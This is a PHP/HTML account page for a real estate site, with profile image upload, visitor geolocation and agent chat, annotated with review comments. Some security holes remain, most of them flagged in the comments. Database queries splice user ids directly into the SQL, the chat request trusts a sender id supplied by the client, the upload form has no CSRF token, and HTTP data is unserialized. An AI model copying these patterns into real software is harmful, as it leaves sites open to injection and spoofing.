<html>
<head>
<title>khalafsons.com</title>
<link rel="icon" type="image/jpg" href="http://khalafsons.com/kvt_con/khalaf_log.jpg" />

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="main_css/myaccount.css" >


</head>

<?php
// Page bootstrap: open the session, then load the database connection and the
// shared helper functions.
// NOTE(review): the <head> markup above is sent before this tag runs, so
// session_start() can only emit its cookie header when output buffering is
// enabled on the server - confirm, or move this tag above the markup.
session_start();
include 'db_con.php';   // presumably defines $con, the mysqli handle used further down - confirm
include 'function.php';
?>

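<?php

// Identity of the signed-in user, taken from the server-side session.
// Both values start as empty strings so the hidden inputs and the SQL further
// down the page never read an undefined variable when no session exists.
// NOTE(review): an unauthenticated request still renders the rest of this page
// with an empty id; consider sending such visitors to the login page before any
// output is produced.
$my_id = '';
$my_cpr = '';

if (isset($_SESSION['id'])) {
	$my_id = $_SESSION['id'];
	// user_cpr can be missing even when id is present; fall back instead of warning.
	$my_cpr = $_SESSION['user_cpr'] ?? '';
}
?>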
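<?php
// Hidden fields for the page's scripts: message_insert() and display_messages()
// read #my_id. Both values are HTML-escaped for the attribute context, and the
// ?? '' fallback keeps the markup valid when no session populated them.
// NOTE(review): user_cpr looks like a personal identifier and no script visible
// on this page reads #my_cpr - confirm it has to be exposed in the page source.
?>
<input id="my_id" style="display:none;" value="<?php echo htmlspecialchars((string) ($my_id ?? ''), ENT_QUOTES, 'UTF-8'); ?>" />
<input id="my_cpr" style="display:none;" value="<?php echo htmlspecialchars((string) ($my_cpr ?? ''), ENT_QUOTES, 'UTF-8'); ?>" />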

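 <?php
// Best-effort geolocation of the visitor. The resulting $country, $region and
// $city are echoed into hidden inputs right after this block.
$user_ip = getenv('REMOTE_ADDR');

// Defaults keep the later echo statements defined when the lookup fails.
$city = '';
$region = '';
$country = '';

// Bound the wait so a slow or unreachable provider cannot stall page rendering.
$geo_context = stream_context_create(['http' => ['timeout' => 3]]);
$geo_response = file_get_contents(
	'http://www.geoplugin.net/php.gp?ip=' . rawurlencode((string) $user_ip),
	false,
	$geo_context
);

// SECURITY(review): the response arrives over plain HTTP from a third party and
// is passed to unserialize(). allowed_classes => false prevents the payload from
// instantiating application classes, but the data can still be altered in
// transit; prefer an HTTPS endpoint that returns JSON and json_decode() if the
// provider offers one - confirm before switching. The visitor's IP address is
// also disclosed to that provider on every page view.
$geo = is_string($geo_response)
	? unserialize($geo_response, ['allowed_classes' => false])
	: false;

// Accept only scalar fields; anything else (missing key, nested value, object
// placeholder) becomes an empty string.
$geo_field = static function ($source, string $key): string {
	if (is_array($source) && isset($source[$key]) && is_scalar($source[$key])) {
		return (string) $source[$key];
	}
	return '';
};

$city = $geo_field($geo, 'geoplugin_city');
$region = $geo_field($geo, 'geoplugin_regionName');
$country = $geo_field($geo, 'geoplugin_countryName');

/*
Keys listed by the original author as present in the response:
geoplugin_request, geoplugin_status, geoplugin_credit, geoplugin_city,
geoplugin_region, geoplugin_areaCode, geoplugin_dmaCode, geoplugin_countryCode,
geoplugin_countryName, geoplugin_continentCode, geoplugin_latitude,
geoplugin_longitude, geoplugin_regionCode, geoplugin_regionName,
geoplugin_currencyCode, geoplugin_currencySymbol,
geoplugin_currencySymbol_UTF8, geoplugin_currencyConverter
*/
?>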

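<?php
// Hidden location fields. The values originate from a remote lookup, so they are
// HTML-escaped before being written into the value attributes; ?? '' keeps the
// markup valid when the lookup produced nothing.
?>
<input type="text" id="country_user" class="helping_id" style="display:none;" value="<?php echo htmlspecialchars((string) ($country ?? ''), ENT_QUOTES, 'UTF-8'); ?>"> 
<input type="text" id="region_user" class="helping_id" style="display:none;" value="<?php echo htmlspecialchars((string) ($region ?? ''), ENT_QUOTES, 'UTF-8'); ?>">
<input type="text" id="city_user" class="helping_id" style="display:none;" value="<?php echo htmlspecialchars((string) ($city ?? ''), ENT_QUOTES, 'UTF-8'); ?>">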



<script>
/*
function disp_agent_area()
{

document.getElementById('disp_agent_area').style.display="block";

}


function show_agent_contact()
{
document.getElementById('agent_contact_output').style.display="block";	
document.getElementById('call_agent_btn').style.display="none";
}

function show_agent_details()
{
document.getElementById('agent_details_div').style.display="block";	
document.getElementById('disp_agent_area').style.display="none";
document.getElementById('main_home_left').style.display="none";	
}*/

function show_upload_profile_div()
{
	// Reveal the profile-image upload panel.
	var upload_panel = document.getElementById('upload_profile_div');
	upload_panel.style.display = "block";
}
function close_upload_profile_div()
{
	// Hide the profile-image upload panel again.
	var upload_panel = document.getElementById('upload_profile_div');
	upload_panel.style.display = "none";
}


</script>


<body onLoad="star_auto_machine();" >

<div class="main_home">

<div class="main_log">

<img src="kvt_con/khalaf_log.jpg" width="100%" height="100%" style="border-radius:20px;" classk="main_home_icon" />

</div>

<div class="main_home_title">Khala Sons Real Estate</div>

<div class="icon_div_right" >

<img onClick="show_search_area();" src="kvt_con/search_icon.png" class="top_right_icons" />
<a href="https://www.facebook.com/Khalaf-Sons-Real-Estate-WLL-899406336847138/" ><img src="kvt_con/fb_icon.png" class="top_right_icons" /></a>
<!--img src="kvt_con/instagram_icon.png" class="top_right_icons" /-->
<a href="https://www.linkedin.com/company/khalaf-sons-real-estate/?viewAsMember=true" ><img src="kvt_con/linkedin.png" class="top_right_icons" /></a>


</div>

</div>

<div class="postion_main_home"></div>

<div id="main_home_left" class="main_home_left">

<a href="index.php"><button class="left_home_btn" >Home</button></a>
<a href="myaccount.php"><button class="left_home_btn" >Myaccount</button></a>
<a href="agent_page.php"><button class="left_home_btn">Our Agents</button></a>


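<?php
	// Choose the label of the profile button: "Edit Profile" when this user
	// already has a custom picture, "upload Profile" while the default avatar is
	// still set. The id is bound as a statement parameter instead of being
	// spliced into the SQL text, and a failed query now counts as "no custom
	// picture" rather than passing a non-result to mysqli_num_rows().
	$get_user_pro ="select id from khalaf_usertb where NOT image_url ='avatar2.jpg' AND id=? ";
	$check_user_pro = 0;
	$stmt_user_pro = mysqli_prepare($con,$get_user_pro);
	if($stmt_user_pro){
		// bind_param needs a real variable; an unset $my_id becomes ''.
		$bound_user_id = (string) ($my_id ?? '');
		mysqli_stmt_bind_param($stmt_user_pro,'s',$bound_user_id);
		if(mysqli_stmt_execute($stmt_user_pro)){
			mysqli_stmt_store_result($stmt_user_pro);
			$check_user_pro = mysqli_stmt_num_rows($stmt_user_pro);
		}
		mysqli_stmt_close($stmt_user_pro);
	}
	if($check_user_pro > 0){
?>

<button onClick="show_upload_profile_div();" class="left_home_btn">Edit Profile</button>

	<?php }else{ ?>
	
<button onClick="show_upload_profile_div();" class="left_home_btn">upload Profile</button>

<?php } ?>	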

<?php /* The log-out link is rendered only when the session carries a user id. */ if (isset($_SESSION['id'])): ?>

<a href="log_out.php"><button class="left_home_btn">Log out</button></a>

<?php endif; ?>

</div>


<div id="upload_profile_div" class="upload_profile_div">

<div onClick="close_upload_profile_div();" class="close_upload_profile_div">x</div>

<div class="profile_input_div">

<form method="post" enctype="multipart/form-data" >

<div style="float:left;width:100%;height:40px;line-height:40px;margin-bottom:10px;text-align:center;font-size:1.3em;color:white;">Upload New Profile ImagesT</div>
<input name="image_file" type="file" style="float:left;width:80%;height:40px;margin-left:10%;background:white;margin-bottom:20px;font-size:1.1em;color:purple;" />
<button name="update_more_profile_images" style="float:left;width:50%;height:40px;margin-left:25%;margin-bottom:20px;font-size:1.1em;border:transparent;background:white;color:purple;border-radius:5px;cursor:pointer;">Upload Image</button>

</form>

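<?php
// Handler for the "Upload Image" form above.
//
// Steps: validate the upload, store it under a fresh random name inside
// user_profile_images/, point the user's row at the new file, and only then
// delete the previous custom picture. The earlier order (delete the old file,
// update the row, move the upload without checking the result) could leave the
// row pointing at a file that was never written.
//
// NOTE(review): the form carries no anti-CSRF token and this handler does not
// itself check that a session exists (with an empty id no row matches and the
// request is rejected below). The upload directory should also be configured so
// the web server never executes files stored in it - confirm server settings.
if(isset($_POST['update_more_profile_images'])){

	// Status banners; the texts are the ones this page has always shown.
	$banner_red = "<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:red;'>";
	$banner_green = "<div style='float:left;width:100%;text-align:center;font-size:1.1em;color:green;'>";
	$save_failed = $banner_red."Something Went Wrong,Data Not Saved</div>";

	// Read the upload entry defensively: every field must have the expected type.
	$upload = (isset($_FILES['image_file']) && is_array($_FILES['image_file'])) ? $_FILES['image_file'] : [];
	$profile_image = (isset($upload['name']) && is_string($upload['name'])) ? $upload['name'] : '';
	$image_tmp = (isset($upload['tmp_name']) && is_string($upload['tmp_name'])) ? $upload['tmp_name'] : '';
	$upload_error = (isset($upload['error']) && is_int($upload['error'])) ? $upload['error'] : UPLOAD_ERR_NO_FILE;

	// The client-supplied name is used for a first, cheap extension check only;
	// it never becomes part of the stored file name.
	$type = strtolower(pathinfo($profile_image, PATHINFO_EXTENSION));

	if($profile_image === ''){

		echo $banner_red."Fill All The Spaces</div>";

	}elseif(!in_array($type, ['jpg', 'jpeg', 'png'], true)){

		echo $banner_red."Image Format Not Supportedd</div>";

	}elseif($upload_error !== UPLOAD_ERR_OK || !is_uploaded_file($image_tmp)){

		// PHP reported a failed/partial upload, or the path is not an upload at all.
		echo $save_failed;

	}else{

		// Take the stored extension from the file's own header rather than from
		// its name. This is a header check only; re-encoding the picture would be
		// a stronger guarantee.
		$image_info = getimagesize($image_tmp);
		$image_kind = is_array($image_info) ? $image_info[2] : 0;
		$extension_for = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];

		if(!isset($extension_for[$image_kind])){

			echo $banner_red."Image Format Not Supportedd</div>";

		}else{

			// bind_param needs real variables; an unset $my_id becomes ''.
			$bound_user_id = (string) ($my_id ?? '');

			// Look up the picture currently recorded for this user.
			$user_image = null;
			$row_found = false;
			$stmt_current = mysqli_prepare($con, "select image_url from khalaf_usertb where id=? ");
			if($stmt_current){
				mysqli_stmt_bind_param($stmt_current, 's', $bound_user_id);
				if(mysqli_stmt_execute($stmt_current)){
					mysqli_stmt_bind_result($stmt_current, $user_image);
					$row_found = (mysqli_stmt_fetch($stmt_current) === true);
				}
				mysqli_stmt_close($stmt_current);
			}

			// 128 random bits: no realistic collision with another user's file,
			// unlike the rand() value used before.
			$random_name = bin2hex(random_bytes(16));
			$new_image = $random_name.'.'.$extension_for[$image_kind];
			$new_path = 'user_profile_images/'.$new_image;

			if(!$row_found || !move_uploaded_file($image_tmp, $new_path)){

				echo $save_failed;

			}else{

				$run_update_image = false;
				$stmt_update = mysqli_prepare($con, "update khalaf_usertb set image_url=? where id=? ");
				if($stmt_update){
					mysqli_stmt_bind_param($stmt_update, 'ss', $new_image, $bound_user_id);
					$run_update_image = mysqli_stmt_execute($stmt_update);
					mysqli_stmt_close($stmt_update);
				}

				if($run_update_image){

					// Best-effort cleanup of the previous custom picture. basename()
					// keeps the delete inside user_profile_images/ whatever the
					// stored value contains; the shared default avatar is never removed.
					if(is_string($user_image) && $user_image !== '' && $user_image !== 'avatar2.jpg'){
						$old_path = 'user_profile_images/'.basename($user_image);
						if(is_file($old_path)){
							unlink($old_path);
						}
					}

					echo $banner_green."New Profile Image Added</div>";

				}else{

					// The row still points at the old picture; drop the orphaned upload.
					unlink($new_path);
					echo $save_failed;
				}
			}
		}
	}
}

?>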

</div>

</div>


<div id="container" class="container">

<?php

	// Load the signed-in user's own row and render the profile card for it.
	// The loop body continues through the markup below; its closing brace sits
	// in a later PHP tag.
	// NOTE(review): $my_id is spliced into the SQL text. It is set from
	// $_SESSION['id'] near the top of the page; binding it as a statement
	// parameter would remove the dependence on how that value was stored - confirm.
	$get_agent ="select * from khalaf_usertb where id='$my_id' ";
	$run_get_agent = mysqli_query($con,$get_agent);
	// NOTE(review): the query result is not checked before it is fetched from.
	while($row_get_agent = mysqli_fetch_array($run_get_agent))
	
	{
		// Columns copied out for the markup that follows; they are echoed there,
		// so they need HTML-escaping at the point of output.
		$agent_fname = $row_get_agent['first_name'];
		$agent_lname = $row_get_agent['last_name'];
		$agent_image = $row_get_agent['image_url'];
		$agent_tel = $row_get_agent['contact'];
        
?>

<div id="single_disp_agent_div" class="single_disp_agent_div">

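<?php
// Profile picture: the bundled default avatar, or the user's own upload.
// The stored file name is HTML-escaped before it is written into the src
// attribute, so a value containing quotes or markup cannot break out of it.
if($agent_image =="avatar2.jpg"){
?>
<div id="single_agent_image_div" onClick="show_agent_details();" class="single_agent_image"><img src="avatar_image/avatar2.jpg" width="100%" height="100%" style="cursor:pointer;" /></div>



<?php  }else{ ?>

<div id="single_agent_image_div"  onClick="show_agent_details();" class="single_agent_image"><img src="user_profile_images/<?php echo htmlspecialchars((string) $agent_image, ENT_QUOTES, 'UTF-8'); ?>" widthk="100%" height="100%" style="cursor:pointer;" /></div>

<?php  } ?>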

 <div id="menu_mob_div" class="menu_mob_div" >
 <button onClick="show_agent_list_mob();" id="show_agent_list_mob_btn" class="show_agent_list_mob_btn" >Chat with the agent</button>
  <button onClick="close_agent_list_mob();" id="close_agent_list_mob_btn" class="show_agent_list_mob_btn" style="display:none;" >Close agent list</button>
<div class="icon_div_right_mob" >


<img id="show_mob_menu_btn" onClick="show_mob_menu();" src="kvt_con/menu.png" class="top_right_mob_menu_icon" />
<img id="close_mob_menu_btn" onClick="close_mob_menu();" src="kvt_con/close_mob_menu.png" class="top_right_mob_menu_icon" style="display:none;" />

<script>

function show_mob_menu()
{
	// Open the left-hand menu and swap the menu icon for the close icon.
	// On narrow screens (under 700px) the profile picture, the agent list and
	// the name/phone block are hidden to make room; otherwise the picture is shown.
	var set_display = function (element_id, mode) {
		document.getElementById(element_id).style.display = mode;
	};

	// Assigned without var, as before: screen_size stays a page-wide global.
	screen_size = screen.width;

	if (screen_size < 700) {
		set_display('single_agent_image_div', "none");
		set_display('agent_list_div', "none");
		set_display('agent_more_info_text', "none");
	} else {
		set_display('single_agent_image_div', "block");
	}

	set_display('main_home_left', "block");
	set_display('show_mob_menu_btn', "none");
	set_display('close_mob_menu_btn', "block");

	window.scrollTo(0,0);
}

function close_mob_menu()
{
	// Close the mobile menu: on narrow screens (under 700px) the left menu and
	// the agent list are hidden and the name/phone block returns; on wider
	// screens the left menu stays visible. The menu icon replaces the close icon
	// and the profile picture is shown again.
	var set_display = function (element_id, mode) {
		document.getElementById(element_id).style.display = mode;
	};

	// Assigned without var, as before: screen_size stays a page-wide global.
	screen_size = screen.width;

	var narrow_steps = [
		['main_home_left', "none"],
		['agent_more_info_text', "block"],
		['agent_list_div', "none"]
	];
	var wide_steps = [
		['main_home_left', "block"]
	];
	var common_steps = [
		['show_mob_menu_btn', "block"],
		['close_mob_menu_btn', "none"],
		['single_agent_image_div', "block"]
	];

	var steps = (screen_size < 700 ? narrow_steps : wide_steps).concat(common_steps);
	for (var i = 0; i < steps.length; i++) {
		set_display(steps[i][0], steps[i][1]);
	}

	window.scrollTo(0,0);
}


function show_agent_list_mob()
{
	// Switch the mobile view to the agent list: the list appears, the profile
	// card pieces and the left menu are hidden, and the "Chat with the agent"
	// button gives way to "Close agent list".
	var steps = [
		['agent_list_div', "block"],
		['single_agent_image_div', "none"],
		['agent_more_info_text', "none"],
		['main_home_left', "none"],
		['show_agent_list_mob_btn', "none"],
		['close_agent_list_mob_btn', "block"]
	];

	for (var i = 0; i < steps.length; i++) {
		document.getElementById(steps[i][0]).style.display = steps[i][1];
	}
}

function close_agent_list_mob()
{
	// Leave the mobile agent list: the list and the left menu are hidden, the
	// profile card pieces return, and the "Chat with the agent" button replaces
	// "Close agent list".
	var steps = [
		['agent_list_div', "none"],
		['single_agent_image_div', "block"],
		['agent_more_info_text', "block"],
		['main_home_left', "none"],
		['show_agent_list_mob_btn', "block"],
		['close_agent_list_mob_btn', "none"]
	];

	for (var i = 0; i < steps.length; i++) {
		document.getElementById(steps[i][0]).style.display = steps[i][1];
	}
}


</script>

</div><!-- end of icon_div_right_mob-->
 
 </div>



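<div id="agent_more_info_text" >
<?php /* Name and phone number come from the stored user row, so they are HTML-escaped before being written into the page. */ ?>
<div class="single_agent_name"><?php echo htmlspecialchars($agent_fname." ".$agent_lname, ENT_QUOTES, 'UTF-8'); ?></div>
<div onClick="" class="more_about_agent">Bahrain</div>
<div id="call_agent_btn"  class="call_agent"><?php echo htmlspecialchars("Mob.".$agent_tel, ENT_QUOTES, 'UTF-8'); ?></div>

</div>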

</div><!--end of single_disp_agent_div  -->

	<?php } ?>
	

<div id="user_textarea_div" class="user_textarea_div">

<div class="message_header">

 <div id="title_agent_name_sms_out" class="title_agent_name_sms_out"></div> 
 <div onClick="close_user_textarea();" class="close_chat_area">X</div> 
 
 
 </div>

<div id="message_display_output"></div>


<div class="user_text_input_div" >

<textarea id="message_input" class="user_text_input" placeholder="Write a message..." ></textarea>
<button onClick="message_insert();" class="user_text_send_btn">send</button>

</div>


<script>
function close_user_textarea()
{
	// Close the chat panel and bring the profile card back; on narrow screens
	// (under 700px) the agent list is shown again as well.
	var set_display = function (element_id, mode) {
		document.getElementById(element_id).style.display = mode;
	};

	set_display('user_textarea_div', "none");
	set_display('single_disp_agent_div', "block");

	// Assigned without var, as before: screen_size stays a page-wide global.
	screen_size = screen.width;
	if (screen_size < 700) {
		set_display('agent_list_div', "block");
	}
}

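function show_agent_name_sms(sans)
{
	// Open the chat panel for the agent whose list entry was clicked.
	// sans: the id suffix of the hidden inputs "agent_id_message<id>" and
	//       "agent_name_message_head<id>" rendered next to each agent.
	// The names below are assigned without var on purpose: message_insert()
	// reads agent_id_out as a page-wide global.
	agent_id_sms = "agent_id_message"+sans;
	agent_name_sms_head = "agent_name_message_head"+sans;

	agent_id_out = document.getElementById(agent_id_sms).value;
	agent_name_out = document.getElementById(agent_name_sms_head).value;

	// textContent instead of innerHTML: the name is stored profile data, and the
	// browser has already HTML-decoded it while parsing the hidden input, so
	// re-parsing it as markup would let a crafted name add elements to the page.
	document.getElementById("title_agent_name_sms_out").textContent = agent_name_out;
	document.getElementById('user_textarea_div').style.display="block";

	screen_size = screen.width;

	// On narrow screens the chat panel replaces the profile card and the list.
	if(screen_size < 700){
		document.getElementById('single_disp_agent_div').style.display="none";
		document.getElementById('agent_list_div').style.display="none";
		window.scrollTo(0,0);
	}
}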

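function message_insert()
{
	// Send the text in #message_input to the agent selected by
	// show_agent_name_sms() (global agent_id_out), clear the input and reload
	// the conversation.
	//
	// Every query value is passed through encodeURIComponent, so a message
	// containing "&", "#", "+" or non-ASCII text reaches the server intact
	// instead of cutting the query string short or adding parameters to it.
	//
	// NOTE(review): my_id is read from a hidden form field, so the sender id in
	// this request is whatever the browser supplies; khalaf_auto.php (not shown
	// here) should take the sender from the session instead. This is also a
	// state-changing request sent with GET; moving it to POST needs a matching
	// change in that endpoint.
	//
	// Names are assigned without var, as before, so they stay page-wide globals.
	user_id = agent_id_out;
	my_id = document.getElementById('my_id').value;
	message_new = document.getElementById('message_input').value;

	xmlhttp = new XMLHttpRequest();

	// The response body is not used; the conversation is reloaded below.
	xmlhttp.onreadystatechange = function() {};

	var query = "my_id=" + encodeURIComponent(my_id)
		+ "&user_id=" + encodeURIComponent(user_id)
		+ "&message_new=" + encodeURIComponent(message_new)
		+ "&status=insert_new_message";

	// Third argument false: the request is synchronous, as in the original.
	xmlhttp.open("GET","khalaf_auto.php?"+query,false);
	xmlhttp.send(null);
	document.getElementById('message_input').value="";

	display_messages(user_id);
}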

//display_messages();
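function display_messages(dm)
{
	// Load the conversation between the signed-in user (#my_id) and the user
	// with id dm, and show it in #message_display_output.
	//
	// Both ids are passed through encodeURIComponent so that an unexpected value
	// cannot add or truncate query parameters.
	//
	// Names are assigned without var, as before, so they stay page-wide globals.
	my_id = document.getElementById('my_id').value;
	user_id = dm;

	xmlhttp = new XMLHttpRequest();

	xmlhttp.onreadystatechange = function() {
		if (this.readyState == 4 && this.status == 200) {
			// NOTE(review): the response is inserted as markup. Message bodies
			// are user-written, so khalaf_auto.php (not shown here) must
			// HTML-escape them before building this fragment - confirm.
			document.getElementById("message_display_output").innerHTML = this.responseText;
		}
	};

	// Third argument false: the request is synchronous, as in the original.
	xmlhttp.open("GET","khalaf_auto.php?my_id="+encodeURIComponent(my_id)+"&user_id="+encodeURIComponent(user_id)+"&status=display_message",false);
	xmlhttp.send(null);
}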


</script>

</div>	



<div id="agent_list_div" class="agent_list_div">

<div class="agent_list_title">Chat Agent List</div>

<?php

	// Build the chat list: every row of khalaf_agenttb except the one whose id
	// equals the signed-in user's id, each joined by hand to its khalaf_usertb row.
	// Both loops stay open through the markup below; their closing braces sit in
	// a later PHP tag.
	// NOTE(review): the filter compares the agent table's own id column with
	// $my_id, while the join below uses its user_id column - confirm which
	// column was meant.
	$get_agent ="select * from khalaf_agenttb where NOT id='$my_id' ";
	$run_get_agent = mysqli_query($con,$get_agent);
	// NOTE(review): neither query result is checked before it is fetched from.
	while($row_get_agent = mysqli_fetch_array($run_get_agent))
	
	{
		$agent_id = $row_get_agent['user_id'];

	// One extra query per agent row; a single JOIN would return the same data
	// in one round trip.
	$get_user ="select * from khalaf_usertb where id='$agent_id'";
	$run_get_user = mysqli_query($con,$get_user);
	while($row_get_user = mysqli_fetch_array($run_get_user)){
	
	    // Columns copied out for the markup that follows; they are echoed there,
	    // so they need HTML-escaping at the point of output.
	    $id_user = $row_get_user['id'];
		$agent_fname = $row_get_user['first_name'];
		$agent_lname = $row_get_user['last_name'];
		$agent_image = $row_get_user['image_url'];
		$agent_tel = $row_get_user['contact'];
        
?>

<div class="single_agent_list">

<div class="single_agent_list_image">

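<?php
// Agent thumbnail: the bundled default avatar, or the agent's own upload.
// The element id carries the agent's user id, which the click handlers pass to
// display_messages() and show_agent_name_sms(). Both the id and the stored file
// name are HTML-escaped before they are written into attributes.
if($agent_image =="avatar2.jpg"){
?>
<img onmouseup="display_messages(this.id);" onClick="show_agent_name_sms(this.id);" id="<?php echo htmlspecialchars((string) $id_user, ENT_QUOTES, 'UTF-8'); ?>" src="avatar_image/avatar2.jpg" width="100%" height="100%" style="cursor:pointer;" />

<?php  }else{ ?>

<img onmouseup="display_messages(this.id);" onClick="show_agent_name_sms(this.id);" id="<?php echo htmlspecialchars((string) $id_user, ENT_QUOTES, 'UTF-8'); ?>" src="user_profile_images/<?php echo htmlspecialchars((string) $agent_image, ENT_QUOTES, 'UTF-8'); ?>" width="100%" height="100%" style="cursor:pointer;" />
 
<?php  } ?>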

</div>


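<div class="single_agent_list_name"><?php
// Agent name as a clickable label, plus the two hidden inputs that
// show_agent_name_sms() looks up by id suffix. The id and the name come from
// the stored user row, so both are HTML-escaped once here and the escaped
// copies are reused for every attribute and text node below.
$agent_id_html = htmlspecialchars((string) $id_user, ENT_QUOTES, 'UTF-8');
$agent_name_html = htmlspecialchars($agent_fname." ".$agent_lname, ENT_QUOTES, 'UTF-8');
echo"<span onmouseup='display_messages(this.id);' onClick='show_agent_name_sms(this.id);' id='$agent_id_html' style='cursor:pointer;'>$agent_name_html</span>";
?></div>

<input id="agent_id_message<?php echo $agent_id_html; ?>" value="<?php echo $agent_id_html; ?>" style="display:none;"/>
<input id="agent_name_message_head<?php echo $agent_id_html; ?>" value="<?php echo $agent_name_html; ?>" style="display:none;" />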

</div>

<?php  } } ?>

</div>


</div><!--end of container -->





<div class="main_remmie">@Khalaf Sons Real Estate</div>

</body>
</html>
